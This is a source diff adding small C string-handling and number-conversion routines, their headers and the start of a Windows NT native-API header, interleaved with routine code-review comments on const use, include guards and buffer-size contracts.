+ if ( cchars==0 )
+ return 0;
+
+ do {
+ c1 = locase_w(*s1);
+ c2 = locase_w(*s2);
+ s1++;
+ s2++;
+ cchars--;
+ } while ( (c1 != 0) && (c1 == c2) && (cchars>0) );
+
+ return (int)(c1 - c2);
+}
diff --git a/Source/Furutaka/minirtl/cmdline.c b/Source/Furutaka/minirtl/cmdline.c
new file mode 100644
index 0000000..1a3aecb
--- /dev/null
+++ b/Source/Furutaka/minirtl/cmdline.c
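Review bot: `char *s0 = (char *)s;` in `_strlen_a` casts away `const` for no reason, and `return (s-s0);` converts a `ptrdiff_t` to `size_t` implicitly; `const char *s0 = s;` and `return (size_t)(s - s0);` say the same thing with the conversion visible (`_strlen_w` likewise). Both variants also return 0 for a NULL argument, which `strlen` does not, and that choice should be stated: `/* Length in elements, excluding the terminator; NULL yields 0. */`.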
@@ -0,0 +1,180 @@
+#include 
+
+BOOL GetCommandLineParamW(
+ IN LPCWSTR CmdLine,
+ IN ULONG ParamIndex,
+ OUT LPWSTR Buffer,
+ IN ULONG BufferSize,
+ OUT PULONG ParamLen
+ )
+{
+ ULONG c, plen = 0;
+ TCHAR divider;
+
+ if (ParamLen != NULL)
+ *ParamLen = 0;
+
+ if (CmdLine == NULL) {
+ if ((Buffer != NULL) && (BufferSize > 0))
+ *Buffer = 0;
+ return FALSE;
+ }
+
+ for (c = 0; c <= ParamIndex; c++) {
+ plen = 0;
+
+ while (*CmdLine == ' ')
+ CmdLine++;
+
+ switch (*CmdLine) {
+ case 0:
+ goto zero_term_exit;
+
+ case '"':
+ CmdLine++;
+ divider = '"';
+ break;
+
+ default:
+ divider = ' ';
+ }
+
+ while ((*CmdLine != '"') && (*CmdLine != divider) && (*CmdLine != 0)) {
+ plen++;
+ if (c == ParamIndex)
+ if ((plen < BufferSize) && (Buffer != NULL)) {
+ *Buffer = *CmdLine;
+ Buffer++;
+ }
+ CmdLine++;
+ }
+
+ if (*CmdLine != 0)
+ CmdLine++;
+ }
+
+zero_term_exit:
+
+ if ((Buffer != NULL) && (BufferSize > 0))
+ *Buffer = 0;
+
+ if (ParamLen != NULL)
+ *ParamLen = plen;
+
+ if (plen < BufferSize)
+ return TRUE;
+ else
+ return FALSE;
+}
+
+BOOL GetCommandLineParamA(
+ IN LPCSTR CmdLine,
+ IN ULONG ParamIndex,
+ OUT LPSTR Buffer,
+ IN ULONG BufferSize,
+ OUT PULONG ParamLen
+ )
+{
+ ULONG c, plen = 0;
+ TCHAR divider;
+
+ if (CmdLine == NULL)
+ return FALSE;
+
+ if (ParamLen != NULL)
+ *ParamLen = 0;
+
+ for (c = 0; c <= ParamIndex; c++) {
+ plen = 0;
+
+ while (*CmdLine == ' ')
+ CmdLine++;
+
+ switch (*CmdLine) {
+ case 0:
+ goto zero_term_exit;
+
+ case '"':
+ CmdLine++;
+ divider = '"';
+ break;
+
+ default:
+ divider = ' ';
+ }
+
+ while ((*CmdLine != '"') && (*CmdLine != divider) && (*CmdLine != 0)) {
+ plen++;
+ if (c == ParamIndex)
+ if ((plen < BufferSize) && (Buffer != NULL)) {
+ *Buffer = *CmdLine;
+ Buffer++;
+ }
+ CmdLine++;
+ }
+
+ if (*CmdLine != 0)
+ CmdLine++;
+ }
+
+zero_term_exit:
+
+ if ((Buffer != NULL) && (BufferSize > 0))
+ *Buffer = 0;
+
+ if (ParamLen != NULL)
+ *ParamLen = plen;
+
+ if (plen < BufferSize)
+ return TRUE;
+ else
+ return FALSE;
+}
+
+char *ExtractFilePathA(const char *FileName, char *FilePath)
+{
+ char *p = (char *)FileName, *p0 = (char *)FileName;
+
+ if ((FileName == 0) || (FilePath == 0))
+ return 0;
+
+ while (*FileName != 0) {
+ if (*FileName == '\\')
+ p = (char *)FileName + 1;
+ FileName++;
+ }
+
+ while (p0 < p) {
+ *FilePath = *p0;
+ FilePath++;
+ p0++;
+ }
+
+ *FilePath = 0;
+
+ return FilePath;
+}
+
+wchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath)
+{
+ wchar_t *p = (wchar_t *)FileName, *p0 = (wchar_t *)FileName;
+
+ if ((FileName == 0) || (FilePath == 0))
+ return 0;
+
+ while (*FileName != 0) {
+ if (*FileName == '\\')
+ p = (wchar_t *)FileName + 1;
+ FileName++;
+ }
+
+ while (p0 < p) {
+ *FilePath = *p0;
+ FilePath++;
+ p0++;
+ }
+
+ *FilePath = 0;
+
+ return FilePath;
+}
diff --git a/Source/Furutaka/minirtl/cmdline.h b/Source/Furutaka/minirtl/cmdline.h
new file mode 100644
index 0000000..310a4a5
--- /dev/null
+++ b/Source/Furutaka/minirtl/cmdline.h
@@ -0,0 +1,35 @@
+#ifndef _CMDLINEH_
+#define _CMDLINEH_
+
+BOOL GetCommandLineParamW(
+ IN LPCWSTR CmdLine,
+ IN ULONG ParamIndex,
+ OUT LPWSTR Buffer,
+ IN ULONG BufferSize,
+ OUT PULONG ParamLen
+ );
+
+BOOL GetCommandLineParamA(
+ IN LPCSTR CmdLine,
+ IN ULONG ParamIndex,
+ OUT LPSTR Buffer,
+ IN ULONG BufferSize,
+ OUT PULONG ParamLen
+ );
+
+char *ExtractFilePathA(const char *FileName, char *FilePath);
+wchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath);
+
+#ifdef UNICODE
+
+#define ExtractFilePath ExtractFilePathW
+#define GetCommandLineParam GetCommandLineParamW
+
+#else // ANSI
+
+#define ExtractFilePath ExtractFilePathA
+#define GetCommandLineParam GetCommandLineParamA
+
+#endif
+
+#endif /* _CMDLINEH_ */
diff --git a/Source/Furutaka/minirtl/minirtl.h b/Source/Furutaka/minirtl/minirtl.h
new file mode 100644
index 0000000..17cf519
--- /dev/null
+++ b/Source/Furutaka/minirtl/minirtl.h
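Review bot: `divider` is declared `TCHAR` in both `GetCommandLineParamW` and `GetCommandLineParamA`, so its width follows the build's UNICODE setting rather than the character type each function actually scans; it should be `WCHAR` in the W variant and `CHAR` in the A variant. The two variants also diverge on a NULL `CmdLine`: the W version NUL-terminates `Buffer` before returning FALSE, the A version returns without touching it, so an A caller that ignores the return value reads an uninitialized buffer. The scan loop stops at `'"'` whatever `divider` is, which means an unquoted argument containing a quote is cut at that quote and the remainder becomes the next parameter — if that is intended it deserves a comment. Finally, the unbraced `if (c == ParamIndex)` wrapping a second `if` reads as a dangling-if; bracing the outer body makes the pairing explicit.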
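Review bot: The declarations carry no contract, and the callers need one: the cmdline.c implementation returns FALSE both for a NULL `CmdLine` and when the parameter did not fit (the final `plen < BufferSize` test), in which case `Buffer` holds a truncated copy while `*ParamLen` reports the full length. `TDLProcessCommandLine` in main.c, visible above, calls `GetCommandLineParam` with `MAX_PATH` and tests only `c == 0`, so an over-long path is silently truncated before it reaches `PathFileExists`. I would document this on the prototype: `/* Copies parameter ParamIndex (0 = program name) into Buffer: at most BufferSize-1 characters plus NUL. Returns TRUE if the whole parameter fit; FALSE on NULL CmdLine or truncation, with *ParamLen set to the full length. */`.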
@@ -0,0 +1,155 @@
+/*
+Module name:
+ minirtl.h
+
+Description:
+ header for string handling and conversion routines
+
+Date:
+ 1 Mar 2015
+*/
+
+#ifndef _MINIRTL_
+#define _MINIRTL_
+
+// string copy/concat/length
+
+char *_strend_a(const char *s);
+wchar_t *_strend_w(const wchar_t *s);
+
+char *_strcpy_a(char *dest, const char *src);
+wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src);
+
+char *_strcat_a(char *dest, const char *src);
+wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src);
+
+char *_strncpy_a(char *dest, size_t ccdest, const char *src, size_t ccsrc);
+wchar_t *_strncpy_w(wchar_t *dest, size_t ccdest, const wchar_t *src, size_t ccsrc);
+
+size_t _strlen_a(const char *s);
+size_t _strlen_w(const wchar_t *s);
+
+// comparing
+
+int _strcmp_a(const char *s1, const char *s2);
+int _strcmp_w(const wchar_t *s1, const wchar_t *s2);
+
+int _strncmp_a(const char *s1, const char *s2, size_t cchars);
+int _strncmp_w(const wchar_t *s1, const wchar_t *s2, size_t cchars);
+
+int _strcmpi_a(const char *s1, const char *s2);
+int _strcmpi_w(const wchar_t *s1, const wchar_t *s2);
+
+int _strncmpi_a(const char *s1, const char *s2, size_t cchars);
+int _strncmpi_w(const wchar_t *s1, const wchar_t *s2, size_t cchars);
+
+char *_strstr_a(const char *s, const char *sub_s);
+wchar_t *_strstr_w(const wchar_t *s, const wchar_t *sub_s);
+
+char *_strstri_a(const char *s, const char *sub_s);
+wchar_t *_strstri_w(const wchar_t *s, const wchar_t *sub_s);
+
+// conversion of integer types to string, returning string length
+
+size_t ultostr_a(unsigned long x, char *s);
+size_t ultostr_w(unsigned long x, wchar_t *s);
+
+size_t ultohex_a(unsigned long x, char *s);
+size_t ultohex_w(unsigned long x, wchar_t *s);
+
+size_t itostr_a(int x, char *s);
+size_t itostr_w(int x, wchar_t *s);
+
+size_t i64tostr_a(signed long long x, char *s);
+size_t i64tostr_w(signed long long x, wchar_t *s);
+
+size_t u64tostr_a(unsigned long long x, char *s);
+size_t u64tostr_w(unsigned long long x, wchar_t *s);
+
+size_t u64tohex_a(unsigned long long x, char *s);
+size_t u64tohex_w(unsigned long long x, wchar_t *s);
+
+// string to integers conversion
+
+unsigned long strtoul_a(char *s);
+unsigned long strtoul_w(wchar_t *s);
+
+unsigned long long strtou64_a(char *s);
+unsigned long long strtou64_w(wchar_t *s);
+
+unsigned long hextoul_a(char *s);
+unsigned long hextoul_w(wchar_t *s);
+
+int strtoi_a(char *s);
+int strtoi_w(wchar_t *s);
+
+signed long long strtoi64_a(char *s);
+signed long long strtoi64_w(wchar_t *s);
+
+unsigned long long hextou64_a(char *s);
+unsigned long long hextou64_w(wchar_t *s);
+
+/* =================================== */
+
+#ifdef UNICODE
+
+#define _strend _strend_w
+#define _strcpy _strcpy_w
+#define _strcat _strcat_w
+#define _strlen _strlen_w
+#define _strncpy _strncpy_w
+
+#define _strcmp _strcmp_w
+#define _strncmp _strncmp_w
+#define _strcmpi _strcmpi_w
+#define _strncmpi _strncmpi_w
+#define _strstr _strstr_w
+#define _strstri _strstri_w
+
+#define ultostr ultostr_w
+#define ultohex ultohex_w
+#define itostr itostr_w
+#define i64tostr i64tostr_w
+#define u64tostr u64tostr_w
+#define u64tohex u64tohex_w
+
+#define strtoul strtoul_w
+#define hextoul hextoul_w
+#define strtoi strtoi_w
+#define strtoi64 strtoi64_w
+#define strtou64 strtou64_w
+#define hextou64 hextou64_w
+
+#else // ANSI
+
+#define _strend _strend_a
+#define _strcpy _strcpy_a
+#define _strcat _strcat_a
+#define _strlen _strlen_a
+#define _strncpy _strncpy_a
+#define _strcmp _strcmp_a
+
+#define _strcmp _strcmp_a
+#define _strncmp _strncmp_a
+#define _strcmpi _strcmpi_a
+#define _strncmpi _strncmpi_a
+#define _strstr _strstr_a
+#define _strstri _strstri_a
+
+#define ultostr ultostr_a
+#define ultohex ultohex_a
+#define itostr itostr_a
+#define i64tostr i64tostr_a
+#define u64tostr u64tostr_a
+#define u64tohex u64tohex_a
+
+#define strtoul strtoul_a
+#define hextoul hextoul_a
+#define strtoi strtoi_a
+#define strtoi64 strtoi64_a
+#define strtou64 strtou64_a
+#define hextou64 hextou64_a
+
+#endif
+
+#endif /* _MINIRTL_ */
diff --git a/Source/Furutaka/minirtl/rtltypes.h b/Source/Furutaka/minirtl/rtltypes.h
new file mode 100644
index 0000000..fbb8b2d
--- /dev/null
+++ b/Source/Furutaka/minirtl/rtltypes.h
@@ -0,0 +1,43 @@
+#ifndef _WCHAR_T_DEFINED
+typedef unsigned short wchar_t;
+#define _WCHAR_T_DEFINED
+#endif /* _WCHAR_T_DEFINED */
+
+#ifndef _SIZE_T_DEFINED
+#ifdef _WIN64
+typedef unsigned __int64 size_t;
+#else /* _WIN64 */
+typedef __w64 unsigned int size_t;
+#endif /* _WIN64 */
+#define _SIZE_T_DEFINED
+#endif /* _SIZE_T_DEFINED */
+
+__forceinline char locase_a(char c)
+{
+ if ((c >= 'A') && (c <= 'Z'))
+ return c + 0x20;
+ else
+ return c;
+}
+
+__forceinline wchar_t locase_w(wchar_t c)
+{
+ if ((c >= 'A') && (c <= 'Z'))
+ return c + 0x20;
+ else
+ return c;
+}
+
+__forceinline char byteabs(char x) {
+ if (x < 0)
+ return -x;
+ return x;
+}
+
+__forceinline int _isdigit_a(char x) {
+ return ((x >= '0') && (x <= '9'));
+}
+
+__forceinline int _isdigit_w(wchar_t x) {
+ return ((x >= L'0') && (x <= L'9'));
+}
diff --git a/Source/Furutaka/minirtl/u64tohex.c b/Source/Furutaka/minirtl/u64tohex.c
new file mode 100644
index 0000000..1e7af7f
--- /dev/null
+++ b/Source/Furutaka/minirtl/u64tohex.c
@@ -0,0 +1,49 @@
+#include "rtltypes.h"
+
+size_t u64tohex_a(unsigned long long x, char *s)
+{
+ char p;
+ size_t c;
+
+ if (s==0)
+ return 16;
+
+ for (c=0; c<16; c++) {
+ p = (char)(x & 0xf);
+ x >>= 4;
+
+ if (p<10)
+ p += '0';
+ else
+ p = 'A' + (p-10);
+
+ s[15-c] = p;
+ }
+
+ s[16] = 0;
+ return 16;
+}
+
+size_t u64tohex_w(unsigned long long x, wchar_t *s)
+{
+ wchar_t p;
+ size_t c;
+
+ if (s==0)
+ return 16;
+
+ for (c = 0; c<16; c++) {
+ p = (wchar_t)(x & 0xf);
+ x >>= 4;
+
+ if (p<10)
+ p += L'0';
+ else
+ p = L'A' + (p-10);
+
+ s[15-c] = p;
+ }
+
+ s[16] = 0;
+ return 16;
+}
diff --git a/Source/Furutaka/minirtl/u64tostr.c b/Source/Furutaka/minirtl/u64tostr.c
new file mode 100644
index 0000000..24c4dba
--- /dev/null
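Review bot: The ANSI branch defines `_strcmp` twice (`#define _strcmp _strcmp_a` both before and after the blank line); the redefinition is identical and therefore legal, but one copy should go. More significant is `#define strtoul strtoul_w` / `strtoul_a`: it rebinds the C standard library name `strtoul` to a one-argument project routine, so a translation unit that sees this header together with `<stdlib.h>` (or any code written against the standard function) gets a macro collision or a silently different call; a prefixed name in the style of the rest of the file (`_strtoul`) avoids that. The `strto*`/`hexto*` prototypes also take non-const `char *`/`wchar_t *` although they only read their argument; `const` would let string literals and `LPCWSTR` values be passed without casts.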
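Review bot: rtltypes.h defines functions (`locase_a`, `locase_w`, `byteabs`, `_isdigit_a`, `_isdigit_w`) but, unlike cmdline.h and minirtl.h, has no include guard, so a second inclusion in one translation unit redefines them. Wrap the file in `#ifndef RTLTYPES_H` / `#define RTLTYPES_H` ... `#endif` (the siblings use an underscore-capital prefix, but that namespace is reserved for the implementation). `byteabs` also has an edge case worth a comment: on a signed-`char` target `-x` for `x == -128` does not fit in `char` and converts back to a negative value, so the function is not an absolute value for that input.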
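Review bot: `u64tohex_a`/`u64tohex_w` always emit 16 digits and store the terminator at `s[16]`, so the caller's buffer needs 17 elements, and the `s==0` path returns 16 — the digit count, not the buffer size; `ultohex_a`/`ultohex_w` in ultohex.c have the corresponding 8-digit/9-element contract and the same gap. A comment above each definition would close it: `/* Writes exactly 16 upper-case hex digits (zero-padded) plus NUL; s must hold 17 elements. Returns 16, also when s is NULL. */`.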
+++ b/Source/Furutaka/minirtl/u64tostr.c
@@ -0,0 +1,45 @@
+#include "rtltypes.h"
+
+size_t u64tostr_a(unsigned long long x, char *s)
+{
+ unsigned long long t = x;
+ size_t i, r=1;
+
+ while ( t >= 10 ) {
+ t /= 10;
+ r++;
+ }
+
+ if (s == 0)
+ return r;
+
+ for (i = r; i != 0; i--) {
+ s[i-1] = (char)(x % 10) + '0';
+ x /= 10;
+ }
+
+ s[r] = (char)0;
+ return r;
+}
+
+size_t u64tostr_w(unsigned long long x, wchar_t *s)
+{
+ unsigned long long t = x;
+ size_t i, r=1;
+
+ while ( t >= 10 ) {
+ t /= 10;
+ r++;
+ }
+
+ if (s == 0)
+ return r;
+
+ for (i = r; i != 0; i--) {
+ s[i-1] = (wchar_t)(x % 10) + L'0';
+ x /= 10;
+ }
+
+ s[r] = (wchar_t)0;
+ return r;
+}
diff --git a/Source/Furutaka/minirtl/ultohex.c b/Source/Furutaka/minirtl/ultohex.c
new file mode 100644
index 0000000..2529c9c
--- /dev/null
+++ b/Source/Furutaka/minirtl/ultohex.c
@@ -0,0 +1,49 @@
+#include "rtltypes.h"
+
+size_t ultohex_a(unsigned long x, char *s)
+{
+ char p;
+ size_t c;
+
+ if (s==0)
+ return 8;
+
+ for (c=0; c<8; c++) {
+ p = (char)(x & 0xf);
+ x >>= 4;
+
+ if (p<10)
+ p += '0';
+ else
+ p = 'A' + (p-10);
+
+ s[7-c] = p;
+ }
+
+ s[8] = 0;
+ return 8;
+}
+
+size_t ultohex_w(unsigned long x, wchar_t *s)
+{
+ wchar_t p;
+ size_t c;
+
+ if (s==0)
+ return 8;
+
+ for (c=0; c<8; c++) {
+ p = (wchar_t)(x & 0xf);
+ x >>= 4;
+
+ if (p<10)
+ p += L'0';
+ else
+ p = L'A' + (p-10);
+
+ s[7-c] = p;
+ }
+
+ s[8] = 0;
+ return 8;
+}
diff --git a/Source/Furutaka/minirtl/ultostr.c b/Source/Furutaka/minirtl/ultostr.c
new file mode 100644
index 0000000..457ccbb
--- /dev/null
+++ b/Source/Furutaka/minirtl/ultostr.c
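Review bot: `u64tostr_a`/`u64tostr_w` store `r` digits and then a terminator at `s[r]`, so the caller must provide `r + 1` elements — 21 for the largest `unsigned long long` — while the `s == 0` path returns `r`, the digit count without the terminator; `ultostr_a`/`ultostr_w` in ultostr.c have the same shape (11 elements for a 32-bit `unsigned long`). TDLMain in main.c appends these into `text[256]` through `_strend`, which is ample there, but the requirement should be stated where the function is defined: `/* Unsigned decimal, no sign. Writes r digits plus NUL (s needs r+1 elements, at most 21); returns r. With s == NULL only the length is computed. */`.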
@@ -0,0 +1,45 @@
+#include "rtltypes.h"
+
+size_t ultostr_a(unsigned long x, char *s)
+{
+ unsigned long t=x;
+ size_t i, r=1;
+
+ while ( t >= 10 ) {
+ t /= 10;
+ r++;
+ }
+
+ if (s == 0)
+ return r;
+
+ for (i = r; i != 0; i--) {
+ s[i-1] = (char)(x % 10) + '0';
+ x /= 10;
+ }
+
+ s[r] = (char)0;
+ return r;
+}
+
+size_t ultostr_w(unsigned long x, wchar_t *s)
+{
+ unsigned long t=x;
+ size_t i, r=1;
+
+ while ( t >= 10 ) {
+ t /= 10;
+ r++;
+ }
+
+ if (s == 0)
+ return r;
+
+ for (i = r; i != 0; i--) {
+ s[i-1] = (wchar_t)(x % 10) + L'0';
+ x /= 10;
+ }
+
+ s[r] = (wchar_t)0;
+ return r;
+}
diff --git a/Source/Furutaka/ntos.h b/Source/Furutaka/ntos.h
new file mode 100644
index 0000000..3b36663
--- /dev/null
+++ b/Source/Furutaka/ntos.h
@@ -0,0 +1,4904 @@ +/************************************************************************************ +* +* (C) COPYRIGHT AUTHORS, 2015, translated from Microsoft sources/debugger +* +* TITLE: NTOS.H +* +* VERSION: 1.33 +* +* DATE: 02 Feb 2016 +* +* Common header file for the ntos API functions and definitions. +* +* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF +* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED +* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A +* PARTICULAR PURPOSE. +* +************************************************************************************/ + +#pragma comment(lib, "ntdll.lib") + +#pragma warning(disable: 4214) // nonstandard extension used : bit field types other than int + +#define IN_REGION(x, Base, Size) (((ULONG_PTR)x >= (ULONG_PTR)Base) && ((ULONG_PTR)x <= (ULONG_PTR)Base + (ULONG_PTR)Size)) + +#define ALIGN_DOWN(count,size) \ + ((ULONG_PTR)(count) & ~((ULONG_PTR)(size) - 1)) + +#define ALIGN_UP(count,size) \ + (ALIGN_DOWN( (ULONG_PTR)(count)+(ULONG_PTR)(size)-1, (ULONG_PTR)(size) )) + +//Access Rights + +#define CALLBACK_MODIFY_STATE 0x0001 +#define CALLBACK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|CALLBACK_MODIFY_STATE ) + +#define DEBUG_READ_EVENT (0x0001) +#define DEBUG_PROCESS_ASSIGN (0x0002) +#define DEBUG_SET_INFORMATION (0x0004) +#define DEBUG_QUERY_INFORMATION (0x0008) +#define DEBUG_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|DEBUG_READ_EVENT|DEBUG_PROCESS_ASSIGN|\ + DEBUG_SET_INFORMATION|DEBUG_QUERY_INFORMATION) + +#define DIRECTORY_QUERY (0x0001) +#define DIRECTORY_TRAVERSE (0x0002) +#define DIRECTORY_CREATE_OBJECT (0x0004) +#define DIRECTORY_CREATE_SUBDIRECTORY (0x0008) +#define DIRECTORY_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0xF) + +#define EVENT_QUERY_STATE 0x0001 +#define EVENT_MODIFY_STATE 0x0002 +#define EVENT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|0x3) + +#define EVENT_PAIR_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE) + 
+#define IO_COMPLETION_QUERY_STATE 0x0001 +#define IO_COMPLETION_MODIFY_STATE 0x0002 +#define IO_COMPLETION_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|0x3) + +#define KEYEDEVENT_WAIT 0x0001 +#define KEYEDEVENT_WAKE 0x0002 +#define KEYEDEVENT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | KEYEDEVENT_WAIT | KEYEDEVENT_WAKE) + +#define MUTANT_QUERY_STATE 0x0001 +#define MUTANT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|MUTANT_QUERY_STATE) + +#define PORT_CONNECT (0x0001) +#define PORT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0x1) + +#define PROFILE_CONTROL (0x0001) +#define PROFILE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | PROFILE_CONTROL) + +#define SEMAPHORE_QUERY_STATE 0x0001 +#define SEMAPHORE_MODIFY_STATE 0x0002 +#define SEMAPHORE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|0x3) + +#define SYMBOLIC_LINK_QUERY (0x0001) +#define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1) + +#define THREAD_ALERT (0x0004) + +#define WORKER_FACTORY_RELEASE_WORKER 0x0001 +#define WORKER_FACTORY_WAIT 0x0002 +#define WORKER_FACTORY_SET_INFORMATION 0x0004 +#define WORKER_FACTORY_QUERY_INFORMATION 0x0008 +#define WORKER_FACTORY_READY_WORKER 0x0010 +#define WORKER_FACTORY_SHUTDOWN 0x0020 + +#define OBJECT_TYPE_CREATE (0x0001) +#define OBJECT_TYPE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1) + +#define WMIGUID_QUERY 0x0001 +#define WMIGUID_SET 0x0002 +#define WMIGUID_NOTIFICATION 0x0004 +#define WMIGUID_READ_DESCRIPTION 0x0008 +#define WMIGUID_EXECUTE 0x0010 +#define TRACELOG_CREATE_REALTIME 0x0020 +#define TRACELOG_CREATE_ONDISK 0x0040 +#define TRACELOG_GUID_ENABLE 0x0080 +#define TRACELOG_ACCESS_KERNEL_LOGGER 0x0100 +#define TRACELOG_CREATE_INPROC 0x0200 +#define TRACELOG_ACCESS_REALTIME 0x0400 +#define TRACELOG_REGISTER_GUIDS 0x0800 + +#define NtCurrentThread() ( (HANDLE)(LONG_PTR) -2 ) +#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 ) +#define ZwCurrentProcess() NtCurrentProcess() +#define ZwCurrentThread() NtCurrentThread() + +// +// Define special 
ByteOffset parameters for read and write operations +// + +#define FILE_WRITE_TO_END_OF_FILE 0xffffffff +#define FILE_USE_FILE_POINTER_POSITION 0xfffffffe + +// +// This is the maximum MaximumLength for a UNICODE_STRING. +// + +#define MAXUSHORT 0xffff +#define MAX_USTRING ( sizeof(WCHAR) * (MAXUSHORT/sizeof(WCHAR)) ) + +typedef struct _UNICODE_STRING { + USHORT Length; + USHORT MaximumLength; + PWSTR Buffer; +} UNICODE_STRING; +typedef UNICODE_STRING *PUNICODE_STRING; +typedef const UNICODE_STRING *PCUNICODE_STRING; + +typedef struct _STRING +{ + USHORT Length; + USHORT MaximumLength; + PCHAR Buffer; +} STRING; +typedef STRING *PSTRING; + +typedef STRING ANSI_STRING; +typedef PSTRING PANSI_STRING; + +typedef STRING OEM_STRING; +typedef PSTRING POEM_STRING; +typedef CONST STRING* PCOEM_STRING; +typedef CONST char *PCSZ; + +typedef struct _CSTRING +{ + USHORT Length; + USHORT MaximumLength; + CONST char *Buffer; +} CSTRING; +typedef CSTRING *PCSTRING; +#define ANSI_NULL ((CHAR)0) + +typedef STRING CANSI_STRING; +typedef PSTRING PCANSI_STRING; + +typedef struct _OBJECT_ATTRIBUTES { + ULONG Length; + HANDLE RootDirectory; + PUNICODE_STRING ObjectName; + ULONG Attributes; + PVOID SecurityDescriptor; + PVOID SecurityQualityOfService; +} OBJECT_ATTRIBUTES; +typedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES; + +typedef struct _IO_STATUS_BLOCK { + union { + NTSTATUS Status; + PVOID Pointer; + } DUMMYUNIONNAME; + + ULONG_PTR Information; +} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK; + +/* +** Semaphore START +*/ + +#ifndef _SEMAPHORE_INFORMATION_CLASS +typedef enum _SEMAPHORE_INFORMATION_CLASS { + SemaphoreBasicInformation +} SEMAPHORE_INFORMATION_CLASS; +#endif + +#ifndef _SEMAPHORE_BASIC_INFORMATION +typedef struct _SEMAPHORE_BASIC_INFORMATION { + LONG CurrentCount; + LONG MaximumCount; +} SEMAPHORE_BASIC_INFORMATION, *PSEMAPHORE_BASIC_INFORMATION; +#endif + +/* +** Semaphore END +*/ + +/* +** FileCache and MemoryList START +*/ + +typedef enum _SYSTEM_MEMORY_LIST_COMMAND { + 
MemoryCaptureAccessedBits, + MemoryCaptureAndResetAccessedBits, + MemoryEmptyWorkingSets, + MemoryFlushModifiedList, + MemoryPurgeStandbyList, + MemoryPurgeLowPriorityStandbyList, + MemoryCommandMax +} SYSTEM_MEMORY_LIST_COMMAND; + +typedef struct _SYSTEM_FILECACHE_INFORMATION { + SIZE_T CurrentSize; + SIZE_T PeakSize; + ULONG PageFaultCount; + SIZE_T MinimumWorkingSet; + SIZE_T MaximumWorkingSet; + SIZE_T CurrentSizeIncludingTransitionInPages; + SIZE_T PeakSizeIncludingTransitionInPages; + ULONG TransitionRePurposeCount; + ULONG Flags; +} SYSTEM_FILECACHE_INFORMATION, *PSYSTEM_FILECACHE_INFORMATION; + +/* +** FileCache and MemoryList END +*/ + +/* +** Processes START +*/ + +#ifndef KPRIORITY +typedef LONG KPRIORITY; +#endif + +typedef enum _THREAD_STATE { + StateInitialized, + StateReady, + StateRunning, + StateStandby, + StateTerminated, + StateWait, + StateTransition, + StateUnknown +} THREAD_STATE; + +typedef enum _KWAIT_REASON { + Executive, + FreePage, + PageIn, + PoolAllocation, + DelayExecution, + Suspended, + UserRequest, + WrExecutive, + WrFreePage, + WrPageIn, + WrPoolAllocation, + WrDelayExecution, + WrSuspended, + WrUserRequest, + WrEventPair, + WrQueue, + WrLpcReceive, + WrLpcReply, + WrVirtualMemory, + WrPageOut, + WrRendezvous, + WrKeyedEvent, + WrTerminated, + WrProcessInSwap, + WrCpuRateControl, + WrCalloutStack, + WrKernel, + WrResource, + WrPushLock, + WrMutex, + WrQuantumEnd, + WrDispatchInt, + WrPreempted, + WrYieldExecution, + WrFastMutex, + WrGuardedMutex, + WrRundown, + MaximumWaitReason +} KWAIT_REASON; + +typedef VOID KSTART_ROUTINE( + _In_ PVOID StartContext + ); +typedef KSTART_ROUTINE *PKSTART_ROUTINE; + +typedef struct _CLIENT_ID { + HANDLE UniqueProcess; + HANDLE UniqueThread; +} CLIENT_ID, *PCLIENT_ID; + +typedef struct _VM_COUNTERS { + SIZE_T PeakVirtualSize; + SIZE_T VirtualSize; + ULONG PageFaultCount; + SIZE_T PeakWorkingSetSize; + SIZE_T WorkingSetSize; + SIZE_T QuotaPeakPagedPoolUsage; + SIZE_T QuotaPagedPoolUsage; + SIZE_T 
QuotaPeakNonPagedPoolUsage; + SIZE_T QuotaNonPagedPoolUsage; + SIZE_T PagefileUsage; + SIZE_T PeakPagefileUsage; + SIZE_T PrivatePageCount; +} VM_COUNTERS; + +typedef struct _SYSTEM_THREAD_INFORMATION { + LARGE_INTEGER KernelTime; + LARGE_INTEGER UserTime; + LARGE_INTEGER CreateTime; + ULONG WaitTime; + PVOID StartAddress; + CLIENT_ID ClientId; + KPRIORITY Priority; + KPRIORITY BasePriority; + ULONG ContextSwitchCount; + THREAD_STATE State; + KWAIT_REASON WaitReason; +} SYSTEM_THREAD_INFORMATION, *PSYSTEM_THREAD_INFORMATION; + +typedef struct _SYSTEM_PROCESSES_INFORMATION { + ULONG NextEntryDelta; + ULONG ThreadCount; + LARGE_INTEGER SpareLi1; + LARGE_INTEGER SpareLi2; + LARGE_INTEGER SpareLi3; + LARGE_INTEGER CreateTime; + LARGE_INTEGER UserTime; + LARGE_INTEGER KernelTime; + UNICODE_STRING ImageName; + KPRIORITY BasePriority; + HANDLE UniqueProcessId; + HANDLE InheritedFromUniqueProcessId; + ULONG HandleCount; + ULONG SessionId; + ULONG_PTR PageDirectoryBase; + VM_COUNTERS VmCounters; + IO_COUNTERS IoCounters; + SYSTEM_THREAD_INFORMATION Threads[1]; +} SYSTEM_PROCESSES_INFORMATION, 